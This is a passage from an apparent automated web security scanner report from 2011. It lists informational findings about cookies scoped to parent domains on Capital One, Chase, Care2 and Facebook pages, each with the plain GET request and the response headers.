Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:11:49 GMT
Server: Apache
Cache-Control: no-cache, no-store, must-revalidate
Set-Cookie: caponesb=c_m%3D4; expires=Thu, 02-Feb-2012 22:11:49 GMT; path=/; domain=.capitalone.com
Vary: Accept-Encoding,User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/
Content-Length: 20960

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>No Ha
...[SNIP]...

10.109. http://www.capitalone.com/sitemap/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.capitalone.com
Path:   /sitemap/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /sitemap/ HTTP/1.1
Host: www.capitalone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:12:34 GMT
Server: Apache
Cache-Control: no-cache, no-store, must-revalidate
Set-Cookie: caponesn=deleted; expires=Tue, 02-Feb-2010 22:12:34 GMT; path=/; domain=.capitalone.com
Vary: Accept-Encoding,User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/
Content-Length: 42178

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Capital One - Sit
...[SNIP]...

10.110. http://www.capitalone.com/smallbusiness/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.capitalone.com
Path:   /smallbusiness/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /smallbusiness/?linkid=WWW_1009_SBUS_A0B2084C1F86D22A0E1FFBF38F9G1F85H5AF4_HOME_H1_17_T_SB1 HTTP/1.1
Host: www.capitalone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:11:58 GMT
Server: Apache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate
Set-Cookie: JSESSIONID=W9HtNJWTnQGllch3pXxkL3TKXyJwhGLCl9P3xbFCLfrvYFRq9yh6!1941958184; path=/
Set-Cookie: TrackedProfileId=YW5vbnltb3VzXzMxNDczMzMwV2VhL3Q4TFdITkRvMHhDTW9rRWFRPT0=; expires=Tuesday, 21-Feb-2079 01:26:05 GMT
Set-Cookie: SmallBusiness=876943e1cy4tLsnPTS0KTk3PTc0riTOoCUktLnFOzcmJMzCq8fF38i3NKckMTi0uzszPc84vBSoxrHGGanKtKEgtykzNS04F6gOq9cxDUwgA; domain=.capitalone.com; expires=Friday, 04-Mar-2011 22:11:58 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/
Content-Length: 59681

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><meta name="description" content="Browse our small business banking products includin
...[SNIP]...

10.111. http://www.capitalone.com/smallbusiness/business-money-market/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.capitalone.com
Path:   /smallbusiness/business-money-market/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /smallbusiness/business-money-market/ HTTP/1.1
Host: www.capitalone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:12:00 GMT
Server: Apache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate
Set-Cookie: JSESSIONID=cgfmNJWQcJvjTlBLWy8QTQF18zjDLG9y6zLG2jyvTXxr2jFQ7lYV!-1710325866; path=/
Set-Cookie: TrackedProfileId=YW5vbnltb3VzXzMxNDU0MDhDdmtVV0dvb0VzajAvTTlLUXNyc1pnPT0=; expires=Tuesday, 21-Feb-2079 01:26:07 GMT
Set-Cookie: SmallBusiness=876943e1cy4tLsnPTS0KTk3PTc0riTOoCUktLnFOzcmJMzCq8fF38i3NKckMTi0uzszPc84vBSoxrHGGanKtKEgtykzNS04F6gOq9cxDUwgA; domain=.capitalone.com; expires=Friday, 04-Mar-2011 22:12:00 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/
Content-Length: 60850

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><meta name="description" content="Open Capital One Direct Banking Savings accounts: B
...[SNIP]...

10.112. http://www.capitalone.com/smallbusiness/cards/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.capitalone.com
Path:   /smallbusiness/cards/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /smallbusiness/cards/ HTTP/1.1
Host: www.capitalone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:11:53 GMT
Server: Apache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate
Set-Cookie: JSESSIONID=XLwQNJWJ5GYGgnZ0NkdH6V6RyJygf7d1Bh1GGL0MF5G5nX3rNBYX!-201819150; path=/
Set-Cookie: TrackedProfileId=YW5vbnltb3VzXzMxNTExMDJialJRVlVqUDEwS3ZWOXRwQytlYytRPT0=; expires=Tuesday, 21-Feb-2079 01:26:00 GMT
Set-Cookie: SmallBusiness=876943e1cy4tLsnPTS0KTk3PTc0riTOoCUktLnFOzcmJMzCq8fF38i3NKckMTi0uzszPc84vBSoxrHGGanKtKEgtykzNS04F6gOq9cxDUwgA; domain=.capitalone.com; expires=Friday, 04-Mar-2011 22:11:53 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/
Content-Length: 68542

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><meta name="description" content="Browse business credit cards online and apply for C
...[SNIP]...

10.113. http://www.capitalone.com/smallbusiness/cards/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.capitalone.com
Path:   /smallbusiness/cards/index.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /smallbusiness/cards/index.php HTTP/1.1
Host: www.capitalone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:11:57 GMT
Server: Apache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate
Set-Cookie: JSESSIONID=FbpnNJWNTkZPPVyCtR9T3vhQFrHc45TyPPQ2LmGLKGmK8b3yr5XQ!1025162061; path=/
Set-Cookie: TrackedProfileId=YW5vbnltb3VzXzMxNDkzMDR1bFp4Rmh3TlZLcVFyL2JUZVJYcE9nPT0=; expires=Tuesday, 21-Feb-2079 01:26:04 GMT
Set-Cookie: SmallBusiness=876943e1cy4tLsnPTS0KTk3PTc0riTOoCUktLnFOzcmJMzCq8fF38i3NKckMTi0uzszPc84vBSoxrHGGanKtKEgtykzNS04F6gOq9cxDUwgA; domain=.capitalone.com; expires=Friday, 04-Mar-2011 22:11:57 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/
Content-Length: 68542

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><meta name="description" content="Browse business credit cards online and apply for C
...[SNIP]...

10.114. http://www.capitalone.com/smallbusiness/payroll/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.capitalone.com
Path:   /smallbusiness/payroll/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /smallbusiness/payroll/ HTTP/1.1
Host: www.capitalone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:11:58 GMT
Server: Apache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate
Set-Cookie: JSESSIONID=1LyBNJWTQDvpxXPth7p4yrMGr417XqLXvtLTJNWJDPZwntqtXcTX!-1660665105; path=/
Set-Cookie: TrackedProfileId=YW5vbnltb3VzXzMxMzk3OTRxNlVsM2hObzczWFlhQ2ZPV01ZajF3PT0=; expires=Tuesday, 21-Feb-2079 01:26:05 GMT
Set-Cookie: SmallBusiness=876943e1cy4tLsnPTS0KTk3PTc0riTOoCUktLnFOzcmJMzCq8fF38i3NKckMTi0uzszPc84vBSoxrHGGanKtKEgtykzNS04F6gOq9cxDUwgA; domain=.capitalone.com; expires=Friday, 04-Mar-2011 22:11:58 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/
Content-Length: 49209

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><meta name="description" content="Business Payroll (SM) - Capital One"/><meta name="k
...[SNIP]...

10.115. https://www.capitalone.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.capitalone.com
Path:   /

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.capitalone.com
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerpl_capitalone.com_443=745088266.65056.0000

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:00:19 GMT
Server: Apache
Set-Cookie: v1st=FBBE6C4A1C9B8436; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.capitalone.com
Cache-Control: no-cache, no-store, must-revalidate
Set-Cookie: itc=CAPITALONE11NZZZintmktgD4; expires=Sun, 03-Apr-2011 22:00:19 GMT; path=/; domain=.capitalone.com
Set-Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; expires=Fri, 04-Mar-2011 22:00:19 GMT; path=/; domain=.capitalone.com
Set-Cookie: caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; expires=Fri, 04-Mar-2011 22:00:19 GMT; path=/; domain=.capitalone.com
Set-Cookie: caponesn=deleted; expires=Tue, 02-Feb-2010 22:00:18 GMT; path=/; domain=.capitalone.com
Vary: Accept-Encoding,User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Keep-Alive: timeout=5, max=50
Connection: Keep-Alive
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 39529

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<h
...[SNIP]...

10.116. https://www.capitalone.com/creditcards/gateway/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.capitalone.com
Path:   /creditcards/gateway/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /creditcards/gateway/ HTTP/1.1
Host: www.capitalone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 02 Feb 2011 22:12:45 GMT
Server: Apache
Cache-Control: no-cache, no-store, must-revalidate
Set-Cookie: caponecc=channel%3DUNS%2A20090715%3Atestgroup%3Dtg11%2A20110113; path=/; domain=.capitalone.com
Set-Cookie: caponesn=f5b8a110S04syM9LTU6OK7YyMrNSCvULtjIyMLA0MDc01S1JNzTUNTIwNAQiYyXrOENTY3NjAA%3D%3D; expires=Wed, 01-Jan-2020 00:00:00 GMT; path=/; domain=.capitalone.com
Set-Cookie: LP_GROUP=test; path=/creditcards/; domain=www.capitalone.com
Location: http://www.capitalone.com/creditcards/?
Vary: Accept-Encoding,User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Content-Length: 0
Connection: close
Content-Type: text/html; charset=ISO-8859-1


10.117. https://www.capitalone.com/scripts/thirdparty/xplus1/xp1vars.js.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.capitalone.com
Path:   /scripts/thirdparty/xplus1/xp1vars.js.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /scripts/thirdparty/xplus1/xp1vars.js.php HTTP/1.1
Host: www.capitalone.com
Connection: keep-alive
Referer: https://www.capitalone.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerpl_capitalone.com_443=745088266.65056.0000; v1st=FBBE6C4A1C9B8436; itc=CAPITALONE11NZZZintmktgD4; caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:00:21 GMT
Server: Apache
Cache-Control: no-cache, no-store, must-revalidate
Set-Cookie: caponesn=deleted; expires=Tue, 02-Feb-2010 22:00:20 GMT; path=/; domain=.capitalone.com
Vary: Accept-Encoding,User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Keep-Alive: timeout=5, max=50
Connection: Keep-Alive
Content-Type: application/x-javascript
Content-Length: 125

var xp1CC = "";
var xp1zip = "0";
var xp1region = "national";
var xp1eosSet = "N";
var xp1PageName = "";

10.118. http://www.care2.com/greenliving/bluefin-tuna-sells-for-396000.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.care2.com
Path:   /greenliving/bluefin-tuna-sells-for-396000.html

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /greenliving/bluefin-tuna-sells-for-396000.html HTTP/1.1
Host: www.care2.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:06:32 GMT
Server: Apache/2.2.8
Set-Cookie: c2_user_state=06b1a9ee60ea3411d50706d6b4b05184%3A0; path=/; domain=.care2.com
Set-Cookie: c2_user_state=f857207c09785572124d4877b07e3ed2%3A0; path=/; domain=.care2.com
X-Pingback: http://www.care2.com/greenliving2/xmlrpc.php
Set-Cookie: geoip=223; expires=Thu, 10-Feb-2011 01:06:32 GMT; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 143217

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:fb="http://www.facebook.com/2008/fbml
...[SNIP]...

10.119. https://www.chase.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.chase.com
Path:   /

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.chase.com
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: JPMC1.0
Date: Wed, 02 Feb 2011 22:00:30 GMT
Content-length: 22894
Content-type: text/html
Set-Cookie: v1st=7623A989437EC784; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.chase.com
CP: "NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Last-modified: Wed, 02 Feb 2011 15:05:03 GMT
Etag: "596e-4d49729f"
Accept-ranges: bytes
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html xmlns:xalan="http://xml.apache.org/xalan" xmlns:java="http://xml.apache.org/xslt/java" LANG="EN"><head>
...[SNIP]...

10.120. https://www.chase.com/wamuwelcome3/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.chase.com
Path:   /wamuwelcome3/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /wamuwelcome3/ HTTP/1.1
Host: www.chase.com
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: JPMC1.0
Date: Wed, 02 Feb 2011 22:00:50 GMT
Content-length: 14892
Content-type: text/html
Set-Cookie: v1st=60B8BEB245ABF79; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.chase.com
CP: "NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Last-modified: Thu, 06 Jan 2011 22:25:12 GMT
Etag: "3a2c-4d264148"
Accept-ranges: bytes

<html LANG="EN" >

<head>
<link rel='stylesheet' type='text/css' href='/ccpmweb/shared/document/ChaseGlobal.css'/>
<script language="Javascript1.2" type="text/javascript">
<!--
...[SNIP]...

10.121. http://www.chasestudentloans.com/studentloans  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.chasestudentloans.com
Path:   /studentloans

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /studentloans HTTP/1.1
Host: www.chasestudentloans.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Content-Length: 169
Content-Type: text/html
Location: http://www.chasestudentloans.com/studentloans/
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: no-cache=Set-Cookie
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Set-Cookie: v1st=5DDC70D33F22CF8D; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.chasestudentloans.com
Date: Wed, 02 Feb 2011 22:16:37 GMT
Connection: close

<head><title>Document Moved</title></head>
<body><h1>Object Moved</h1>This document may be found <a HREF="http://www.chasestudentloans.com/studentloans/">here</a></body>

10.122. http://www.facebook.com/2008/fbml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /2008/fbml

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /2008/fbml HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=8CJHTYhjyotVYfKpZ5B35lnF; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS;

Response

HTTP/1.1 404 Not Found
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: lsd=41jA_; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
Connection: close
Date: Thu, 03 Feb 2011 01:06:40 GMT
Content-Length: 11422

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
